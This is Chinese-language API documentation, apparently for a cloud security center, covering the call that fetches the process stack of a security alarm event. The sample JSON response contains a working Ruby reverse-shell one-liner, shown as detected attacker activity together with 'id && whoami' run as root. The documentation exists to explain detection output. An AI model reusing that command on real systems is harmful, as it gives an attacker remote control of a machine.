获取异常报警事件的堆栈信息。
调试
您可以在OpenAPI Explorer中直接运行该接口,免去您计算签名的困扰。运行成功后,OpenAPI Explorer可以自动生成SDK代码示例。
授权信息
下表是API对应的授权信息,可以在RAM权限策略语句的Action
元素中使用,用来给RAM用户或RAM角色授予调用此API的权限。具体说明如下:
- 操作:是指具体的权限点。
- 访问级别:是指每个操作的访问级别,取值为写入(Write)、读取(Read)或列出(List)。
- 资源类型:是指操作中支持授权的资源类型。具体说明如下:
- 对于必选的资源类型,用背景高亮的方式表示。
- 对于不支持资源级授权的操作,用
全部资源
表示。
- 条件关键字:是指云产品自身定义的条件关键字。
- 关联操作:是指成功执行操作所需要的其他权限。操作者必须同时具备关联操作的权限,操作才能成功。
操作 | 访问级别 | 资源类型 | 条件关键字 | 关联操作 |
---|---|---|---|---|
yundun-sas:DescribeAlarmEventStackInfo | get | *全部资源 * |
| 无 |
请求参数
名称 | 类型 | 必填 | 描述 | 示例值 |
---|---|---|---|---|
SourceIp | string | 否 | 访问源的 IP 地址。 | 192.168.XX.XX |
Lang | string | 否 | 设置请求和接收消息的语言类型,默认为 zh。取值:
| zh |
Uuid | string | 是 | 要查询的资产的 UUID。 说明
调用 DescribeSuspEvents 接口获取该参数。
| 18b7336e-d469-473b-af83-8e5420f9**** |
EventName | string | 是 | 事件名称。 说明
详细信息请参见 DescribeSuspEvents 接口获取该参数。
| Variable Trojan |
UniqueInfo | string | 是 | 告警事件的唯一标识。 | 1fbe8d16727f61d1478a674d6fa0**** |
ResourceDirectoryAccountId | long | 否 | 资源目录成员账号主账号 ID。 说明
调用 DescribeMonitorAccounts 接口可以获取该参数。
| 127608589417**** |
返回参数
示例
正常返回示例
JSON
格式
{
"StackInfo": "[\n {\n \"child\": [\n {\n \"child\": [\n {\n \"child\": [\n \n ],\n \"data\": {\n \"cmdline\": \"id\",\n \"proc_path\": \"/bin/id\",\n \"pid\": \"[3033]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n },\n {\n \"child\": [\n \n ],\n \"data\": {\n \"cmdline\": \"whoami\",\n \"proc_path\": \"/bin/whoami\",\n \"pid\": \"[3035]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n ],\n \"data\": {\n \"cmdline\": \"/bin/bash -c 'id && whoami'\",\n \"proc_path\": \"/bin/bash\",\n \"pid\": \"[3022]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n ],\n \"data\": {\n \"src_ip\": \"0.0.0.0\",\n \"cmdline\": \"ruby -rsocket -e exit if fork;c=TCPSocket.new(\\\"0.0.0.0\\\",\\\"1111\\\");while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end\",\n \"file\": \"ruby\",\n \"login_port\": \"22\",\n \"login_type\": \"password\",\n \"proc_path\": \"/usr/bin/ruby\",\n \"dst_port\": \"1111\",\n \"pid\": \"3011\",\n \"user\": \"root\",\n \"dst_ip\": \"0.0.0.0\",\n \"log_time\": \"2020-01-20 09:00:00\"\n },\n \"description\": {\n \"extend\": [\n {\n \"content\": \"${tpl_netstat}\",\n \"content_type\": \"text\"\n }\n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n]",
"RequestId": "ECC6B3E3-D496-512D-B46D-E6996A6B63EE"
}
错误码
HTTP status code | 错误码 | 错误信息 | 描述 |
---|---|---|---|
400 | NoPermission | no permission | 无此服务的访问权限。 |
400 | RdCheckNoPermission | Resource directory account verification has no permission. | 资源目录账号校验无权限。 |
403 | NoPermission | caller has no permission | 当前操作未被授权,请联系主账号在RAM控制台进行授权后再执行操作。 |
500 | RdCheckInnerError | Resource directory account service internal error. | 资源目录账号服务内部错误。 |
500 | ServerError | ServerError | 服务故障,请稍后重试! |
访问错误中心查看更多错误码。
变更历史
变更时间 | 变更内容概要 | 操作 |
---|---|---|
2023-07-20 | OpenAPI 错误码发生变更、OpenAPI 入参发生变更 | 查看变更详情 |